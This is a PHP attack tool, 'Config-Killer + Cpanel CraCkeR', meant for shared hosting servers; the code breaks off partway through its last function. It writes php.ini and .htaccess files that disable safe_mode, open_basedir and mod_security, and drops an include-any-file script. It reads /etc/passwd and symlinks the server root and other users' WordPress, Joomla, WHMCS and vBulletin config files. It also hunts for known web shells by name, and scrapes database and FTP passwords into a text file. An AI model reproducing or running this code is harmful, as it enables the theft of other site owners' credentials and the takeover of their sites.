Config-Killer + Cpanel CraCkeR

<?php


$head = '
<html>
<head>
</script>


<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #00ff00;
color: #00ff00;
}
td {
BORDER: dashed 1px #00ff00;
color: #00ff00;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #00ff00;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #00ff00;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #00ff00;
color: #00ff00;
}
table {
BORDER: dashed 1px #00ff00;
BORDER-COLOR: #00ff00;
BACKGROUND-COLOR: Black;
color: #00ff00;
}
input {
border          : solid 3px ;
border-color        : #00ff00;
BACKGROUND-COLOR: white;
font: 11pt Verdana;
color: #00ff00;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #00ff00 1px solid;
BORDER-LEFT:   #00ff00 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #00ff00;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #00ff00;
}
textarea {
border          : dashed 1px #00ff00;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #00ff00;
}
BODY {
    SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff00; SCROLLBAR-SHADOW-color: #00ff00; SCROLLBAR-3DLIGHT-color: #00ff00; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff00; SCROLLBAR-DARKSHADOW-color: #00ff00
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin          : -287px 0px 0px -490px;
BORDER: dashed 1px #00ff00;
BORDER-COLOR: #00ff00;
}
.tt {
background-color: Black;
}

A:link {
    COLOR: White; TEXT-DECORATION: none
}
A:visited {
    COLOR: White; TEXT-DECORATION: none
}
A:hover {
    color: Red; TEXT-DECORATION: none
}
A:active {
    color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>'; ?>
<html>

<title>Config-Killer + Cpanel  CraCkeR</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<p align="center">
<img border="0" src="http://www.alm3refh.com/images/groupxp.gif" width="426" height="169"></p>
    <head>

<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
<form method=post><font color=white size=2 face="comic sans ms">KICK SAFE MODE</font><br>
<input type=submit name=ini value="Generate PHP.ini / ini.php / .htaccess" /></form>
<?php
    if(isset($_POST['ini']))
    {


        $yamini=fopen('php.ini','w+') or die("can't open file");
        $rr=" safe_mode=Off\n short_open_tag = On\n log_errors = On\n log_errors_max_len = 1024\n ignore_repeated_errors = On\n magic_quotes_runtime = Off\n magic_quotes_gpc = On\n AddHandler application/x-httpd-php4 .php\n display_errors = Off\n disable_functions=Bypassed_By_Yamraaj-IHOS\n safe_mode_gid=Off\n open_basedir=Off\n register_globals=on\n exec=On\n shell_exec=On\n allow_url_fopen=On ";
        fwrite($yamini,$rr);

        $yamhtm = fopen("ihos.html", "w+") or die("can't open file");
        fwrite($yamhtm, "<title>404 Not Found</title>\n");

        $yamhtm1 = fopen("group.html", "w+") or die("can't open file");
        fwrite($yamhtm1, "<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request lol.</p><iframe src=\"ip.php\" title=\"404 not found\" width=\"10\" height=\"10\" style=\"visibility:hidden;position:absolute;left:0;top:0;\"></iframe></body>\n");

        $yamht = fopen(".htaccess", "w+");
        fwrite($yamht, "#[YAM] here ..go FUCK your self
Options +Indexes
DirectoryIndex yam.html
IndexIgnore ini.php ihos.html group.html
ErrorDocument 404 /group.html
RedirectMatch 404 ^/maachodporkies/.*$
IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
HeaderName ihos.html
ReadmeName group.html
<IfModule mod_security.c>
                    SecFilterEngine Off
                     SecFilterScanPOST Off
                    </IfModule>\n\r");

        $yaminiphp = fopen("ini.php", "w+");
        fwrite($yaminiphp, "<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>");

        $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to view PHP.INI</u></font></a>";
        echo $link;


        }


    ?>
<div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
<form method=post>
<font color=white size=2 face="comic sans ms">MANUAL SYMLINK<br><input type=submit name=man value="Open Manual symlink form"><p></form>
    <?php
    if(isset($_POST['man']))
{
?>
<form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">&nbsp file name with  which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned)  for file which will represent symlink<br><br><input type=submit name=manual value="maar le >.<"></form>
<?php
}
    ?>
    <?php
    error_reporting(0);
    if(isset($_POST['manual']))
    {
    $dlink=trim($_POST['dli']);
     $fna=trim($_POST['fna']);
     mkdir('group',0777);
    $rr  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('group/.htaccess','w');
fwrite($g,$rr);
$final="group/".$fna;
symlink($dlink,$final);

echo "<br>bhaiyu maine ".$dlink." ko jahaan symlink kiya, uska link==> <a href=".$final."><font color=red size=3>is here</font></a>";
}
    ?><p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>

    <form method=post>
<font color=white size=3 face="comic sans ms">406 error bypasser on public_html folder <br><input type=submit name=4 value="ghuma de billu x-("><p></form>
    <?php
    if(isset($_POST['4']))
{
mkdir('group.ihos',0777);
    $rr  = "<body bgcolor=black><center><font color=white size=2 > SANIYA KI BARAT ME AAYA HAI KYA </font><br><img src='http://www.alm3refh.com/images/groupxp.gif'>";
$g = fopen('group.ihos/index.html','w');
fwrite($g,$rr);
$r="group.ihos/";
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
$us=$str[0];


                     }
echo '<br>bhaiyu check this directory for all symlinked users public_html directory with 406 error bypassed  ==> <a href="group.ihos/"><font color=red size=4><u>group.ihos</u></font></a>';
}
    ?>

    <p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>

<font color=white size=2 face="comic sans ms">Automated mass symlink wala jugaad </font><br><font color=white size=2 face="comic sans ms"> Root dir aur configs toh free hai </font><br><font color=white size=2 face="comic sans ms">  Server me jitna shell hai wo bhi dikhayega</font>
<form method=post>
    <input type=submit name="usre" value="use to Extract usernames" /></form>


    <?php
    if(isset($_POST['usre'])){
        ?><form method=post>
    <textarea rows=10 cols=50 name=user><?php  $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}

?></textarea><br><br>
    <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
    <?php } ?>
    <?php
    error_reporting(0);
    echo "<font color=red size=2 face=\"comic sans ms\">";
    if(isset($_POST['su']))
    {
    mkdir('group.txt',0777);
$rr  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('group.txt/.htaccess','w');
fwrite($g,$rr);
$groupshell = symlink("/","group.txt/root");
            $rt="<a href=group.txt/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
        echo "check link given below for / folder symlink <br><u>$rt</u>";


            $dir=mkdir('group.shell',0777);
        $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \nIndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble \n Require None \n Satisfy Any";
        $f = fopen('group.shell/.htaccess','w');

        fwrite($f,$r);
        $consym="<a href=group.shell/><font color=white size=3 face=\"comic sans ms\">shells & defaces</font></a>";
        echo "<br>shell and deface by other hackers in whole server <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

            $usr=explode("\n",$_POST['user']);
        $configuration=array("adminfinder.php","AK-74.php","Ani-Shell.php","antichat.php","ASP.php","aspx.php","auto.php","ayyildiz.php","aZRaiLPhp.php","backupsql.php","c0derz.php","CasuS.php","cihshell.php","CTT.php","CWShellDumper.php","CyberSpy5.php","d3v1l5c4f3.php","dbman.php","dC3.php","dq.php","Dx.php","DxShell.php","EFSO.php","eg.php","ekin0x.php","elmaliseker.php","Evilc0der.php","fso.php","ftp.php","gamma.php","GFS.php","gfs_sh.php","go-shell.php","h4ntu.php","hackrich.php","hiddens.php","ida.php","if.php","image.php","iMHaBiRLiGi.php","iMHaPFtp.php","indexer.php","ironshell.php","KA.php","kacak.php","kayredmoon.php","klasvayv.php","lamashell.php","liz0zim.php","load_shell.php","Loaderz.php","localhost.php","log.php","login.php","Macker.php","madspot_shell.php","matamu.php","me64.php","MGZ.php","Miller.php","MyShell.php","mysql.php","MYSql.php","mysql_tool.php","mysqlwebsh.php","NCC-Shell.php","Netcat.php","NetworkFileManagerPHP.php","NFM.php","NGH.php","NIX.php","nshell.php","nstview.php","NTDaddy.php","nsuser.php","Oops.php","PHVayv.php","PHANTASMA.php","PHPShell.php","php.php","php-backdoor.php","php-include-w-shell.php","pHpINJ.php","PHPJackal.php","phpRemoteView.php","PhpSpy.php","PHVayv.php","PostShell.php","Predator.php","Private-i3lue.php","PRiV8.php","pws.php","r00t.php","reader.php","redcod.php","RemExp.php","remview_fix.php","rootshell.php","ru24_post_sh.php","s72.php","Safe_Mode.php","safe0ver.php","saudi_sh3ll.php","send.php","ShAnKaR.php","simattacker.php","simple_cmd.php","simple-backdoor.php","SimShell.php","Sincap.php","sa_3.php","SnIpEr_Sa.php","sosyete.php","South.php","sql.php","STNC.php","symlink_urduhack.php","t5.php","tero.php","thebaron.php","tryag.php","up.php","urduhack.php","Uploader.php","vb.php","web-shell.php","WinX.php","wso_shell.php","wso2.php","zacosmall.php","zehir4.asp","zehir4.php","ZyklonShell.php","c99.php","c100.php","r57.php","b374k.php","c22.php","symlink_sa.php","webr00t.php","cpanel.php","wso.php","404.php","aarya.php","greenshell.php","ddos.php","madspot.php","1337.php","31337.php","WSO.php","bc.php","cpn.php","sh3ll.php","dz0.php","whcms.php","gaza.php","d0mains.php","changeall.php","h4x0r.php","L3b.php","uploads.php","cmd.php","shell.asp","cmd.asp","sh3ll.asp","b374k-2.2.php","m1n1.php","b374km1n1.php","MCA.php","madspoit.php","error_log.php","error_logs.php","error.php","madz.php","mad.php","mad2.php","4041.php","D.php","anon.php",".mm.php","hacking Sec.php","s3.php","anonymous.php","Ch3rn0by1.php","strt123.php","madspotshell.php","sh3lla.php","priv8.php","private.php","cp.php","x.php",".php","cpbrute.php","hacked.php","wso24.php","wso26.php","wso404.php","sym.php","symsa2.php","sym3.php","sym4.php","whmcs.php","um3rh.php","whmcskiller.php","cracker.php","1.php","2.php","database.php","a.php","d.php","dz.php","system.php","um3r.php","zone-h.php","root.php","loveajkal.php","doom.php","dam.php","killer.php","user.php","sh3ll3d.php","uploader.php","xd.php","d00.php","h4xor.php","kinoz.php","TTzone.php","pak.php","w.php","dom.php","d.php","oops.php?","web.php","spider.php","upload.php","shelled.php","sh3lled.php","pce.php","PCE.php","3.php","sym1.php","pakshell.php","saz.php","myc99.php","bca.php","mca.php","wellcome.php","Symlink.php","symlink.php","domains.php","cpbt.php","jowp.php","B-F.php","lol.php","hack.php","dhan.php","dhanush.php","php.ini","ini.php","wss.php","dk.php","Log.php","legal.php","I-47.php","merashell.php","b.php","insta!l.php","xx.php","box.php","b0x.php","jinx.php","asd.php","TCS.php","tcs.php","team.php","love.php","webadmin.php","devil.php","UChaNK.php","sst.php","dh.php","black.php","404en.php","angel.php","m4d.php","symsa3.php","unlimit-sym.php","403.php","haxor.php","Symlink_Sa3.php","immi.php","thsh3ll.php","SM()K3RZ!.php","mcs.php","ck.php","dmass.php","class.php","wpm.php","codacker.php","data.php",".12345.php","confkiller.php","wp-bt.php","haxseeker.php","wso_immi.php","helix.php","akky.php","yele.php","mc.php","db.php","Webr00t.php","mad_immi.php","immi_sa.php","GX.php","upload.phtml","whm.php","whm1.php","whmfckr.php","whmkiller.php","BNT Shell.php","BNTShell.php","BNT.php","bnt.php","cok.php","inject.php","injection.php","Xinject.php","x0rg-Bypass.php","cgi.php","Crystal.php","FSO.php","gfs.php","lama.php","massdeface.php","mass.php","k.php","kk.php","bp.php","bypass.php","cp.php","cpanel.php","domains.php","don3.php","ep.php","etx.php","ftp.php","hulk.php","groupshell.php","inx.php","killer3.php","mannu.php","mannu1.php","mannumod.php","modebp.php","no.php","rr.php","rr2.php","symkiller.php","ts.php","ts1.php","tttt.php","w.php","w2.php","cof.pl","cgishell.pl","allsoft.pl","user.pl","config.pl","MCA.html","ittihad.html","x.html","y.html","3xp1r3.html","deface.html","defaced.html","AlphaCop.html","mca.html","Tcs.html","root.html","r00t.html","lol.html","pce.html","pce.html","bca.html","y.htm","x.htm","3xp1r3.htm","x.txt","COOKIE.txt","wp.txt","joomla.txt","passwd.txt","named.txt","login.txt","password.txt","ftp.txt");
        foreach($usr as $uss )
        {
            $us=trim($uss);

            foreach($configuration as $c)
            {
             $rs="/home/".$us."/public_html/".$c;
             $r="group.shell/".$us." .. ".$c;
             symlink($rs,$r);

        }

            }


        $dir=mkdir('group.conf',0777);
        $r  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex group.html  \n   Require None \n Satisfy Any";
        $f = fopen('group.conf/.htaccess','w');

        fwrite($f,$r);
        $consym="<a href=group.conf/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
        echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

            $usr=explode("\n",$_POST['user']);

        foreach($usr as $uss )
        {
            $us=trim($uss);

            $r="group.conf/";
             symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
        symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
        symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
        symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
        symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
        symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomlablog');
        symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
        symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
        symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..vbforum');
        symlink('/home/'.$us.'/public_html/cc/includes/config.php',$r.$us.'..vbcc');
        symlink('/home/'.$us.'/public_html/connect.php',$r.$us.'..connect');
        symlink('/home/'.$us.'/public_html/mk_conf.php',$r.$us.'..mk-portale1');
        symlink('/home/'.$us.'/public_html/include/config.php',$r.$us.'..Marketecture');
        symlink('/home/'.$us.'/public_html/includes/functions.php',$r.$us.'..phpbb3');
        symlink('/home/'.$us.'/public_html/include/db.php',$r.$us.'..infinity');
        symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..invisio');
        symlink('/home/'.$us.'/public_html/forum/conf_global.php',$r.$us.'..forumconfglobal');
        symlink('/home/'.$us.'/public_html/forums/conf_global.php',$r.$us.'..forumsconf_global');
        symlink('/home/'.$us.'/public_html/forums/config.php',$r.$us.'..forumsconfig');
        symlink('/home/'.$us.'/public_html/forum/config.php',$r.$us.'..forumconfig');
        symlink('/home/'.$us.'/public_html/includes/sql.php',$r.$us.'..InculdeSql');
        symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..LibConfig');
        symlink('/home/'.$us.'/public_html/lib/db.php',$r.$us.'..LibDb');
        symlink('/home/'.$us.'/public_html/db.php',$r.$us.'..Db');
        symlink('/home/'.$us.'/public_html/shop/config.php',$r.$us.'..ShopConfig');
        symlink('/home/'.$us.'/public_html/dbconnect.php',$r.$us.'..dbconnect');
        symlink('/home/'.$us.'/public_html/dbc.php',$r.$us.'..dbc');
        symlink('/home/'.$us.'/public_html/includes/dbc.php',$r.$us.'..Includedbc');
        symlink('/home/'.$us.'/public_html/includes/dbconnect.php',$r.$us.'..Includedbconnect');
        symlink('/home/'.$us.'/public_html/admincp/config.inc',$r.$us.'..config.inc');
        symlink('/home/'.$us.'/public_html/mycp/config/functions/db.php',$r.$us.'..mycpDb');
        symlink('/home/'.$us.'/public_html/include/connection.php',$r.$us.'..connection');
        symlink('/home/'.$us.'/public_html/webpanel/config.inc.php',$r.$us.'..WebpanelConfigInc');
        symlink('/home/'.$us.'/public_html/include/config.inc.php',$r.$us.'..CopperminePhotoGallery');
        symlink('/home/'.$us.'/public_html/conf/_basic_config.php',$r.$us.'..B2Evolution');
        symlink('/home/'.$us.'/public_html/inc/header.inc.php',$r.$us.'..BoonexDolphin');
        symlink('/home/'.$us.'/public_html/config/site.php',$r.$us.'..Concrete5CS');
        symlink('/home/'.$us.'/public_html/site/config.php',$r.$us.'..Concrete5SC');
        symlink('/home/'.$us.'/public_html/includes/global.inc.php',$r.$us.'..CubeCart');
        symlink('/home/'.$us.'/public_html/e107_config.php',$r.$us.'..e107');
        symlink('/home/'.$us.'/public_html/faq_config.php',$r.$us.'..FAQMasterFlex');
        symlink('/home/'.$us.'/public_html/db-config.php',$r.$us.'..GeeklogDBC');
        symlink('/home/'.$us.'/public_html/siteconfig.php',$r.$us.'..GeeklogSiteC');
        symlink('/home/'.$us.'/public_html/lib-common.php',$r.$us.'..GeeklogLibCom');
        symlink('/home/'.$us.'/public_html/private/db-config.php',$r.$us.'..glfusion');
        symlink('/home/'.$us.'/public_html/hotaru_settings.php',$r.$us.'..Hotaru');
        symlink('/home/'.$us.'/public_html/livesite/config.php',$r.$us.'..LiveSite');
        symlink('/home/'.$us.'/public_html/config/config.properties.php',$r.$us.'..LifeType');
        symlink('/home/'.$us.'/public_html/app/etc/local.xml',$r.$us.'..Magento');
        symlink('/home/'.$us.'/public_html/manager/includes/config.inc.php',$r.$us.'..MODx');
        symlink('/home/'.$us.'/public_html/app/config.php',$r.$us.'..NoahsClassifieds');
        symlink('/home/'.$us.'/public_html/info.php',$r.$us.'..ocPortal');
        symlink('/home/'.$us.'/public_html/ow_includes/config.php',$r.$us.'..Oxwall');
        symlink('/home/'.$us.'/public_html/mysql.class.php',$r.$us.'..phpFormGenerator');
        symlink('/home/'.$us.'/public_html/mysql.php',$r.$us.'..phpFormGenerator');
        symlink('/home/'.$us.'/public_html/mysql-db.php',$r.$us.'..phpFormGenerator');
        symlink('/home/'.$us.'/public_html/config/config.php',$r.$us.'..PHPlist');
        symlink('/home/'.$us.'/public_html/defaults.php',$r.$us.'..phpMyDirectory');
        symlink('/home/'.$us.'/public_html/include/inc_conf/conf.inc.php',$r.$us.'..phpWCMS');
        symlink('/home/'.$us.'/public_html/conf/config.php',$r.$us.'..phpWebSite');
        symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..PhpWikiLibcon');
        symlink('/home/'.$us.'/public_html/libs/dbconnect.php',$r.$us.'..Pligg');
        symlink('/home/'.$us.'/public_html/config/dbconnect.php',$r.$us.'..ConfigDbconnect');
        symlink('/home/'.$us.'/public_html/sohoadmin/config/isp.conf.php',$r.$us.'..Soholaunch');
        symlink('/home/'.$us.'/public_html/textpattern/config.php',$r.$us.'..Textpattern');
        symlink('/home/'.$us.'/public_html/db/local.php',$r.$us.'..TikiWiki');
        symlink('/home/'.$us.'/public_html/typo3conf/localconf.php',$r.$us.'..TYPO3');
        symlink('/home/'.$us.'/public_html/mainfile.php',$r.$us.'..Xoops');
        symlink('/home/'.$us.'/public_html/zp-data/zenphoto.cfg',$r.$us.'..Zen Photo');
        symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..MyBB');
        symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..Phpbb');
        symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..Phpbb-forum');
        symlink('/home/'.$us.'/public_html/forums/includes/config.php',$r.$us.'..Phpbb-forums');
        symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Smf');
        symlink('/home/'.$us.'/public_html/settings.php',$r.$us.'..smf');
        symlink('/home/'.$us.'/public_html/includes/settings.php',$r.$us.'..WebCalendar');
        symlink('/home/'.$us.'/public_html/config/settings.php',$r.$us.'..ConfigSettings');
        symlink('/home/'.$us.'/public_html/config/settings.inc.php',$r.$us.'..PrestaShop');
        symlink('/home/'.$us.'/public_html/forum/Settings.php',$r.$us.'..forumSettings');
        symlink('/home/'.$us.'/public_html/forums/Settings.php',$r.$us.'..forumsSettings');
        symlink('/home/'.$us.'/public_html/site/default/settings.php',$r.$us.'..Drupal');
        symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..Drupals');
        symlink('/home/'.$us.'/public_html/admin/conf.php',$r.$us.'..AdminConf');
        symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..OpenCart');
        symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..osCommerceAdmin');
        symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..osCommerce');
        symlink('/home/'.$us.'/public_html/forms/admin/config.inc.php',$r.$us.'..phpFreeChat');
        symlink('/home/'.$us.'/public_html/admin.php',$r.$us.'..PhpWikiAdmin');
        symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..ShopSite-TomatoCart-ZenCart');
        symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..ShpSite-TmtCart-ZenCart');
        symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..Whm');
        symlink('/home/'.$us.'/public_html/whmc/configuration.php',$r.$us.'..Whmc');
        symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..Whmc-Supp');
        symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..Whmcs-Cli');
        symlink('/home/'.$us.'/public_html/billings/configuration.php',$r.$us.'..Whmcs-blis');
        symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..Whmcs-bil');
        symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..Whmcs-clis');
        symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..Whmcs-clies');
        symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..Whmcs-clie');
        symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..Whmcs-csup');
        symlink('/home/'.$us.'/public_html/whmcs/WHM/configuration.php',$r.$us.'..Whmcs-WHM');
        symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..Whmc-WHM');
        symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whm-WHMCS');
        symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..whm-whmcs');
        symlink('/home/'.$us.'/public_html/hosting/configuration.php',$r.$us.'..Whm-Hosting');
        symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..Whmcs');
        symlink('/home/'.$us.'/public_html/order/configuration.php',$r.$us.'..Whmcs-Order');
                        }
                }
    ?>

<?php
//////////////////////////////////////
/////password grabbing section////////
//////////////////////////////////////
?>

<form method=post>
        <input type=submit name=select value="khul ja config se password nikalne wala graber ">
        </form>

    <?php
    if(isset($_POST['select']))
    {
        ?><div align=center>
    <font color=#ff9933 size=2 face="comic sans ms">checkmark configuration files, for those you want to grab passwords
 <table width=30% >
     <tr>
         <td align=right width=50%>
             <br>
 <font color=red size=3>
     wordpress => <br>
     joomla => <br>
     whmcs =><br>
     VBulletin => <br>
     unknown => <br>
     ftp(joomla) => <br>
     <br>
 </td>
 <td align=left >
     <form method="post"><br>
<input type="checkbox" name="config[]" value="wp"><br>
<input type="checkbox" name="config[]" value="joomla"><br>
<input type="checkbox" name="config[]" value="whmcs"><br>
<input type="checkbox" name="config[]" value="vb"><br>
<input type="checkbox" name="config[]" value="other"><br>
<input type="checkbox" name="config[]" value="jftp"><br>
</td>
     </tr>
           </table><br>
<input type="submit" name=sm value="billu..Hit this server.. hard " />
</form>
<p>
    <?php
}
?>
<?php

set_time_limit(0);

function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}

function data($lu)
{
    $ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];

}


      if(isset($_POST['sm']))
        {
////////////////
///file opener//
////////////////
$ffile=fopen('P-list.txt','a+');

//////////////////////
//symlink directory///
//////////////////////
 $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/group.conf/";
$re=$r;

////////////////////////
///username extractor///
////////////////////////
if(!empty($_POST['config']))
                {

$users=file("/etc/passwd");
foreach($users as $user)
{

$str=explode(":",$user);
$usersss=$str[0];


                   foreach($_POST['config'] as $check)
                     {

////////////////
///wordpress////
////////////////
                       if($check == "wp")
                         {
                           $wpc=array("..wp-config","..word-wp","..wpblog");

                        foreach($wpc as $wpcon)
                          {
                               $finalurl=$re.$usersss.$wpcon;
                              $content=data($finalurl);

                              if($content && preg_match('/table_prefix/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is wordpress </font></td></tr></table>";

                                 echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
                                    if(!empty($dbp))
                                            $pass=$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }


                          }

                     }
////////////
// joomla //
////////////


                     if($check == "joomla")
                     {
                        $joomlac=array("..joomla-or-whmcs","..joomla");
                         foreach($joomlac as $joomlacon)
                          {
                              $finalurl=$re.$usersss.$joomlacon;
                              $content=data($finalurl);

                              if($content && preg_match('/dbprefix/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";

                                 echo "mysql server password ==> ". $dbp=entre2v2($content,"password = '","';");
                                    if(!empty($dbp))
                                            $pass=$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }


                          }


                         }
///////////////
////whmcs /////
///////////////

                          if($check == "whmcs")
                         {
                         $whmcsc=array("..joomla-or-whmcs","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
                         foreach($whmcsc as $whmcscon)
                          {
                              $finalurl=$re.$usersss.$whmcscon;
                              $content=data($finalurl);

                              if($content && preg_match('/cc_encryption_hash/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website whmcs bhaiyu  </font></td></tr></table>";

                                 echo "mysql server password ==> ". $dbp=entre2v2($content,"db_password = '","';");
                                    if(!empty($dbp))
                                            $pass=$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }
                          }
                         }
/////////////////
///VBulletin////
////////////////
                            if($check == "vb")
                         {
                         $vbc=array("..vbinc","..vb");
                         foreach($vbc as $vbcon)
                          {
                              $finalurl=$re.$usersss.$vbcon;
                              $content=data($finalurl);

                              if($content && preg_match('/admincpdir/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is vbulletin </font></td></tr></table>";

                                 echo "mysql server password ==> ". $dbp=entre2v2($content,"password'] = '","';");
                                    if(!empty($dbp))
                                            $pass=$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }
                          }
                         }
/////////////////
///joomla ftp////
////////////////
                          if($check == "jftp")
                     {
                        $joomlac=array("..joomla-or-whmcs","..joomla");
                         foreach($joomlac as $joomlacon)
                          {
                              $finalurl=$re.$usersss.$joomlacon;
                              $content=data($finalurl);

                              if($content && preg_match('/dbprefix/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";

                                 $dbp=entre2v2($content,"ftp_pass = '","';");
                                 $dbu=entre2v2($content,"ftp_user = '","';");
                                    if(!empty($dbp))
                                    echo "ftp  user is ==> ". $dbu=entre2v2($content,"ftp_user = '","';");
                                    echo "<br>ftp  password is ==> ". $dbp=entre2v2($content,"ftp_pass = '","';");

